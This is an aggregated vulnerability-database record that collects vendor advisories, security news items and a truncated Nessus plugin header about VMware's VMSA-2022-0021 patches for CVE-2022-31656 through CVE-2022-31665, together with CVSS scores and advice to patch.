Threat Level Vulnerability Report

Summary: VMware has addressed multiple vulnerabilities, including an authentication bypass (CVE-2022-31656), remote code execution (CVE-2022-31658, CVE-2022-31659, and CVE-2022-31665), and many more flaws.
{"malwarebytes": [{"lastseen": "2022-08-11T20:55:05", "description": "In a new critical security advisory, [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), VMWare describes multiple vulnerabilities in several of its products, one of which has a [CVSS](<https://www.malwarebytes.com/blog/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.8. Exploiting these vulnerabilities would enable a threat actor with network access to bypass authentication and execute code remotely.\n\n## Vulnerabilities\n\nVMWare patched several other vulnerabilities. These bugs would enable attackers to gain remote code execution or to escalate privileges to 'root' on unpatched servers.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). You will find the most important ones listed below.\n\n### CVE-2022-31656\n\n[CVE-2022-31656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656>) is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users and was assigned a CVSS score of 9.8 out of 10. A remote attacker with network access to a vulnerable user interface could use this flaw to bypass authentication and gain administrative access. (VMWare credits security researcher [Petrus Viet](<https://twitter.com/VietPetrus/status/1554485970514608128>) with discovering this vulnerability.)\n\n### CVE-2022-31659 and CVE-2022-31658\n\nThe same researcher found two Remote Code Execution (RCE) vulnerabilities with a CVSS score of 8 out of 10--[CVE-2022-31658](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31658>) and [CVE-2022-31659](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31659>). 
CVE-2022-31658 is a JDBC injection RCE, and CVE-2022-31659 is a SQL injection RCE. Both can be chained with CVE-2022-31656, turning the authentication bypass achieved into something that allows an attacker to perform remote code execution. These vulnerabilities also affect VMware Workspace ONE Access, Identity Manager, and vRealize Automation products.\n\n### CVE-2022-31665\n\n[CVE-2022-31665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31665>) is a JDBC injection RCE vulnerability that exists in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. JDBC (Java Database Connectivity) is an application programming interface (API) for Java, which defines how a client may access a database. A malicious actor with administrator and network access can trigger a remote code execution.\n\n## Other privilege escalation vulnerabilities\n\nBesides the already mentioned vulnerability listed as CVE-2022-31656, VMWare fixed [CVE-2022-31660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31660>), [CVE-2022-31661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31661>), and [CVE-2022-31664](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31664>), which are all local privilege escalation vulnerabilities. 
These vulnerabilities would allow a threat actor with local access to escalate privileges to 'root'.\n\n## Mitigation\n\nEven though there is no evidence that the critical CVE-2022-31656 authentication bypass vulnerability is actively being exploited in attacks, VMWare states that it is extremely important that you quickly take steps to patch or mitigate all the issues in on-premises deployments.\n\nTo fully protect yourself and your organization, please install one of the patch versions listed in the [VMware Security Advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), or use the workarounds listed in the VMSA.\n\nStay safe, everyone!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T13:00:00", "type": "malwarebytes", "title": "Update now! 
VMWare patches critical vulnerabilities in several products", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T13:00:00", "id": "MALWAREBYTES:9E428F767EFCD8CC64A0BC77175C8151", "href": "https://www.malwarebytes.com/blog/news/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-03T15:33:33", "description": "In a new critical security advisory, [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), VMWare describes multiple vulnerabilities in several of its products, one of which has a [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) score of 9.8. Exploiting these vulnerabilities would enable a threat actor with network access to bypass authentication and execute code remotely.\n\n## Vulnerabilities\n\nVMWare patched several other vulnerabilities. These bugs would enable attackers to gain remote code execution or to escalate privileges to 'root' on unpatched servers.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). You will find the most important ones listed below.\n\n### CVE-2022-31656\n\n[CVE-2022-31656](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31656>) is an authentication bypass vulnerability in VMware Workspace ONE Access, Identity Manager, and vRealize Automation that affects local domain users and was assigned a CVSS score of 9.8 out of 10. A remote attacker with network access to a vulnerable user interface could use this flaw to bypass authentication and gain administrative access. 
(VMWare credits security researcher [Petrus Viet](<https://twitter.com/VietPetrus/status/1554485970514608128>) with discovering this vulnerability.)\n\n### CVE-2022-31659 and CVE-2022-31658\n\nThe same researcher found two Remote Code Execution (RCE) vulnerabilities with a CVSS score of 8 out of 10\u2014[CVE-2022-31658](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31658>) and [CVE-2022-31659](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31659>). CVE-2022-31658 is a JDBC injection RCE, and CVE-2022-31659 is a SQL injection RCE. Both can be chained with CVE-2022-31656, turning the authentication bypass achieved into something that allows an attacker to perform remote code execution. These vulnerabilities also affect VMware Workspace ONE Access, Identity Manager, and vRealize Automation products.\n\n### CVE-2022-31665\n\n[CVE-2022-31665](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31665>) is a JDBC injection RCE vulnerability that exists in VMware Workspace ONE Access, Identity Manager, and vRealize Automation. JDBC (Java Database Connectivity) is an application programming interface (API) for Java, which defines how a client may access a database. A malicious actor with administrator and network access can trigger a remote code execution.\n\n## Other privilege escalation vulnerabilities\n\nBesides the already mentioned vulnerability listed as CVE-2022-31656, VMWare fixed [CVE-2022-31660](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31660>), [CVE-2022-31661](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31661>), and [CVE-2022-31664](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31664>), which are all local privilege escalation vulnerabilities. 
These vulnerabilities would allow a threat actor with local access to escalate privileges to 'root'.\n\n## Mitigation\n\nEven though there is no evidence that the critical CVE-2022-31656 authentication bypass vulnerability is actively being exploited in attacks, VMWare states that it is extremely important that you quickly take steps to patch or mitigate all the issues in on-premises deployments.\n\nTo fully protect yourself and your organization, please install one of the patch versions listed in the [VMware Security Advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>), or use the workarounds listed in the VMSA. \n\nStay safe, everyone!", "cvss3": {}, "published": "2022-08-03T13:27:47", "type": "malwarebytes", "title": "Update now! 
VMWare patches critical vulnerabilities in several products", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T13:27:47", "id": "MALWAREBYTES:4AD7D9B99AE2ADD1CBB83E0522B03A21", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/08/update-now-vmware-patches-critical-vulnerabilities-in-several-products/", "cvss": {"score": 0.0, "vector": "NONE"}}], "impervablog": [{"lastseen": "2022-08-11T20:01:31", "description": "### Takeaways:\n\n * VMWare Workspace ONE vulnerabilities CVE-2022-31656 and CVE-2022-31659 work in tandem to allow a remote attacker with network access to conduct remote code execution on the server.\n * Imperva Threat Research has seen a sharp rise in attacks since a POC was published on August 9, mostly targeting US and Singapore-based sites.\n * Imperva\u2019s defenses have caught thousands of attacks using automated tools developed in the Go programming language, and 30% of attacking IPs have a risk score of 70% or higher.\n * Imperva has deployed dedicated security rules to cover both CVEs.\n\nOn August 9, 2022, a proof-of-concept was released for VMWare\u2019s earlier security advisories CVE-2022-31656 and CVE-2022-31659, published on August 2, 2022. Both of these vulnerabilities affect VMWare Workspace ONE, and build on each other to ultimately allow for remote code execution. \n\nFor context, CVE-2022-31656 allows users with network access to obtain administrative access without authentication, and CVE-2022-31659 allows remote code execution once the malicious user obtains administrator privileges. 
VMWare has released [patches](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) for both CVEs, and it is recommended that all VMWare Workspace ONE clients apply these patches immediately to mitigate potential exploitation.\n\nImperva began witnessing attack attempts trying to exploit CVE-2022-31656 immediately after the POC was published on August 9, and we\u2019re continuing to see these numbers steadily rise. Most attacks are targeting customers in the US and Singapore across the educational and financial industries, although _all_ VMWare Workspace ONE customers should take action to prevent intrusions. \n\nSo far, Imperva has found several thousand attack attempts, and 30% of the attacking IPs have a risk score of 70% or above. The vast majority of attackers are using automated tools developed in the Go programming language. \n\nSince Imperva\u2019s CWAF has multiple layers of security defense, attack attempts trying to exploit CVE-2022-31656 were initially detected by existing security rules, threat reputation, and bot protection policies. We\u2019ve deployed complete coverage for both vulnerabilities, so all CWAF customers and On-Premises WAF customers with SecureSphere Emergency Feed are protected from CVE-2022-31656 and CVE-2022-31659. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-10T16:55:48", "type": "impervablog", "title": "What we know about VMWare CVE-2022\u201331656 and CVE-2022\u201331659", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31659"], "modified": "2022-08-10T16:55:48", "id": "IMPERVABLOG:EFE468EB28E318764FFAA6B250FFFE78", "href": "https://www.imperva.com/blog/what-we-know-about-vmware-cve-2022-31656-and-cve-2022-31659/", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa": [{"lastseen": "2022-08-12T14:02:35", "description": "VMware has released security updates to address multiple vulnerabilities in VMware\u2019s Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector, and vRealize Automation. A remote attacker could exploit some of these vulnerabilities to take control of an affected system. \n\n**Updated August 8, 2022:** According to VMware, \"VMware has confirmed malicious code that can exploit CVE-2022-31656 and CVE-2022-31659 in impacted products is publicly available.\"\n\nCISA encourages users and administrators to review VMware Security Advisory [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) and apply the necessary updates. 
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T00:00:00", "type": "cisa", "title": "VMware Releases Security Updates ", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31659"], "modified": "2022-08-09T00:00:00", "id": "CISA:78745C11D5F7CDA41C77C0A98F92D5D5", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/08/03/vmware-releases-security-updates", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2022-08-11T18:59:39", "description": "VMware and experts alike are urging users to patch multiple products affected by a critical authentication bypass vulnerability that can allow an attacker to gain administrative access to a system as well as exploit other flaws.\n\nThe bug\u2014tracked as [CVE-2022-31656](<https://tenable.com/cve/CVE-2022-31656>)\u2014earned a rating of 9.8 on the CVSS and is one of a number of fixes the company made in various products [in an update](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) released on Tuesday for flaws that could easily become an exploit chain, researchers said.\n\nCVE-2022-31656 is also certainly the most dangerous of these vulnerabilities, and likely 
will become more so as the researcher who discovered it\u2013[Petrus Viet](<https://twitter.com/VietPetrus>) of VNG Security\u2013has promised [in a tweet](<https://twitter.com/VietPetrus/status/1554485970514608128>) that a proof-of-concept exploit for the bug is \u201csoon to follow,\u201d experts said.\n\nThis adds urgency to the need for organizations affected by the flaw to patch now, researchers said.\n\n\u201cGiven the prevalence of attacks targeting VMware vulnerabilities and a forthcoming proof-of-concept, organizations need to make patching CVE-2022-31656 a priority,\u201d [Claire Tills](<https://www.tenable.com/profile/claire-tills>), senior research engineer with Tenable\u2019s Security Response Team, said in an email to Threatpost. \u201cAs an authentication bypass, exploitation of this flaw opens up the possibility that attackers could create very troubling exploit chains.\u201d\n\n## **Potential for Attack Chain**\n\nSpecifically, CVE-2022-31656 is an authentication bypass vulnerability affecting VMware Workspace ONE Access, Identity Manager and vRealize Automation.\n\nThe bug affects local domain users and requires that a remote attacker must have network access to a vulnerable user interface, according to [a blog post](<https://www.tenable.com/blog/cve-2022-31656-vmware-patches-several-vulnerabilities-in-multiple-products-vmsa-2022-0021>) by Tills published Tuesday. 
Once an attacker achieves this, he or she can use the flaw to bypass authentication and gain administrative access, she said.\n\nMoreover, the vulnerability is the gateway to exploiting other remote code execution (RCE) flaws addressed by VMWare\u2019s release this week\u2014[CVE-2022-31658](<https://www.tenable.com/cve/CVE-2022-31658>) and [CVE-2022-31659](<https://www.tenable.com/cve/CVE-2022-31659>)\u2014to form an attack chain, Tills observed.\n\nCVE-2022-31658 is a JDBC injection RCE vulnerability that affects VMware Workspace ONE Access, Identity Manager and vRealize Automation that\u2019s earned an \u201cimportant\u201d score on the CVSS\u20148.0. The flaw allows a malicious actor with administrator and network access to trigger RCE.\n\nCVE-2022-31659 is an SQL injection RCE vulnerability that affects VMware Workspace ONE Access and Identity Manager and also earned a rating of 8.0 with a similar attack vector to CVE-2022-31658. Viet is credited with discovering both of these flaws.\n\nThe other six bugs patched in the update include another RCE bug (CVE-2022-31665) rated as important; two privilege escalation vulnerabilities (CVE-2022-31660 and CVE-2022-31661) rated as important; a local privilege escalation vulnerability (CVE-2022-31664) rated as important; a URL Injection Vulnerability (CVE-2022-31657) rated as moderate; and a path traversal vulnerability (CVE-2022-31662) rated as moderate.\n\n## **Patch Early, Patch Everything**\n\nVMware is no stranger to having to rush out patches for critical bugs found in its products, and has suffered its share of security woes due to the ubiquity of its platform across enterprise networks.\n\nIn late June, for example, federal agencies warned of [attackers pummeling](<https://threatpost.com/log4shell-targeted-vmware-data/180072/>) VMware Horizon and Unified Access Gateway (UAG) servers to exploit the now-infamous 
[Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) RCE vulnerability, an [easy-to-exploit flaw](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) discovered in the Apache logging library Log4J late last year and [continuously targeted](<https://threatpost.com/vmware-bugs-abused-mirai-log4shell/179652/>) on VMware and other platforms since then.\n\nIndeed, sometimes even patching has still not been enough for VMware, with attackers targeting existing flaws after the company does its due diligence to release a fix.\n\nThis scenario occurred in December 2020, when [the feds warned](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) the adversaries were actively exploiting a weeks-old bug in Workspace One Access and Identity Manager products three days after the vendor patched the vulnerability.\n\nThough all signs point to the urgency of patching the latest threat to VMware\u2019s platform, it\u2019s highly likely that even if the advice is heeded, the danger will persist for the foreseeable future, observed one security professional.\n\nThough enterprises tend to initially move quickly to patch the most imminent threats to their network, they often miss other places attackers can exploit a flaw, observed Greg Fitzgerald, co-founder of Sevco Security, in an email to Threatpost. This is what leads to persistent and ongoing attacks, he said.\n\n\u201cThe most significant risk for enterprises isn\u2019t the speed at which they are applying critical patches; it comes from not applying the patches on every asset,\u201d Fitzgerald said. 
\u201cThe simple fact is that most organizations fail to maintain an up-to-date and accurate IT asset inventory, and the most fastidious approach to patch management cannot ensure that all enterprise assets are accounted for.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T15:23:16", "type": "threatpost", "title": "VMWare Urges Users to Patch Critical Authentication Bypass Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T15:23:16", "id": "THREATPOST:556939F8D58337486DFBC3B2A820DE47", "href": "https://threatpost.com/vmware-patch-critical-bug/180346/", "cvss": {"score": 0.0, "vector": "NONE"}}], "thn": [{"lastseen": "2022-08-03T09:59:40", "description": "Virtualization services provider VMware on Tuesday shipped updates to [address 10 security flaws](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) affecting multiple products that could be abused by unauthenticated attackers to perform malicious actions.\n\nThe issues, tracked from CVE-2022-31656 through CVE-2022-31665 (CVSS scores: 4.7 - 9.8), impact VMware Workspace ONE Access, Workspace ONE Access Connector, Identity Manager, Identity 
Manager Connector, vRealize Automation, Cloud Foundation, and vRealize Suite Lifecycle Manager.\n\nThe most severe of the flaws is CVE-2022-31656 (CVSS score: 9.8), an authentication bypass vulnerability affecting local domain users that could be leveraged by a bad actor with network access to obtain administrative rights.\n\nAlso resolved by VMware are three remote code execution vulnerabilities (CVE-2022-31658, CVE-2022-31659, and CVE-2022-31665) related to JDBC and SQL injection that could be weaponized by an adversary with administrator and network access.\n\nElsewhere, it has also remediated a reflected cross-site scripting (XSS) vulnerability (CVE-2022-31663) that it said is a result of improper user sanitization, which could lead to the activation of malicious JavaScript code.\n\nRounding off the patches are three local privilege escalation bugs (CVE-2022-31660, CVE-2022-31661, and CVE-2022-31664) that permit an actor with local access to escalate privileges to \"root,\" a URL injection vulnerability (CVE-2022-31657), and a path traversal bug (CVE-2022-31662).\n\nWhile successful exploitation of CVE-2022-31657 makes it possible to redirect an authenticated user to an arbitrary domain, CVE-2022-31662 could equip an attacker to read files in an unauthorized manner.\n\nVMware said it's not aware of the exploitation of these vulnerabilities in the wild, but urged customers using the vulnerable products to [apply the patches immediately](<https://core.vmware.com/vmsa-2022-0021-questions-answers-faq>) to mitigate potential threats.\n
", "cvss3": {}, "published": "2022-08-03T04:49:00", "type": "thn", "title": "VMware Releases Patches for Several New Flaws Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-03T08:25:40", "id": "THN:97305EC3B8A0058F1A01ECB0B12FBD3E", "href": "https://thehackernews.com/2022/08/vmware-releases-patches-for-several-new.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "vmware": [{"lastseen": "2022-11-02T03:01:01", "description": "3a. Authentication Bypass Vulnerability (CVE-2022-31656) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31658) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3c. SQL injection Remote Code Execution Vulnerability (CVE-2022-31659) \n\nVMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3d. 
Local Privilege Escalation Vulnerability (CVE-2022-31660, CVE-2022-31661) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3e. Local Privilege Escalation Vulnerability (CVE-2022-31664) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31665) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.6. \n\n3g. URL Injection Vulnerability (CVE-2022-31657) \n\nVMware Workspace ONE Access and Identity Manager contain a URL injection vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9. \n\n3h. Path traversal vulnerability (CVE-2022-31662) \n\nVMware Workspace ONE Access, Identity Manager, Connectors and vRealize Automation contain a path traversal vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3i. Cross-site scripting (XSS) vulnerability (CVE-2022-31663) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a reflected cross-site scripting (XSS) vulnerability. 
VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 4.7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T00:00:00", "type": "vmware", "title": "VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-09T00:00:00", "id": "VMSA-2022-0021.1", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0021.1.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-12T17:12:24", "description": "3a. Authentication Bypass Vulnerability (CVE-2022-31656) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31658) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3c. 
SQL injection Remote Code Execution Vulnerability (CVE-2022-31659) \n\nVMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.0. \n\n3d. Local Privilege Escalation Vulnerability (CVE-2022-31660, CVE-2022-31661) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. VMware has evaluated the severity of these issues to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3e. Local Privilege Escalation Vulnerability (CVE-2022-31664) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8. \n\n3f. JDBC Injection Remote Code Execution Vulnerability (CVE-2022-31665) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a remote code execution vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.6. \n\n3g. URL Injection Vulnerability (CVE-2022-31657) \n\nVMware Workspace ONE Access and Identity Manager contain a URL injection vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.9. \n\n3h. Path traversal vulnerability (CVE-2022-31662) \n\nVMware Workspace ONE Access, Identity Manager, Connectors and vRealize Automation contain a path traversal vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3. \n\n3i. 
Cross-site scripting (XSS) vulnerability (CVE-2022-31663) \n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a reflected cross-site scripting (XSS) vulnerability. VMware has evaluated the severity of this issues to be in the Moderate severity range with a maximum CVSSv3 base score of 4.7.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T00:00:00", "type": "vmware", "title": "VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation updates address multiple vulnerabilities.", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-08-02T00:00:00", "id": "VMSA-2022-0021", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0021.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2023-01-27T15:05:22", "description": "The VMware Workspace One Access (formerly VMware Identity Manager) application running on the remote host is affected by the following vulnerabilities:\n\n - An authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. (CVE-2022-31656)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution. 
(CVE-2022-31658)\n\n - A remote code execution vulnerability. A malicious actor with administrator and network access can trigger a remote code execution. (CVE-2022-31659)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "nessus", "title": "VMware Workspace One Access / VMware Identity Manager Multiple Vulnerabilities (VMSA-2022-0021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-31656", "CVE-2022-31657", "CVE-2022-31658", "CVE-2022-31659", "CVE-2022-31660", "CVE-2022-31661", "CVE-2022-31662", "CVE-2022-31663", "CVE-2022-31664", "CVE-2022-31665"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:vmware:identity_manager", "cpe:/a:vmware:workspace_one_access"], "id": "VMWARE_WORKSPACE_ONE_ACCESS_VMSA-2022-0021.NASL", "href": "https://www.tenable.com/plugins/nessus/163939", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163939);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2022-31656\",\n \"CVE-2022-31657\",\n \"CVE-2022-31658\",\n \"CVE-2022-31659\",\n \"CVE-2022-31660\",\n \"CVE-2022-31661\",\n \"CVE-2022-31662\",\n \"CVE-2022-31663\",\n \"CVE-2022-31664\",\n \"CVE-2022-31665\"\n );\n script_xref(name:\"VMSA\", value:\"2022-0021\");\n script_xref(name:\"IAVA\", value:\"2022-A-0303\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0027\");\n\n 
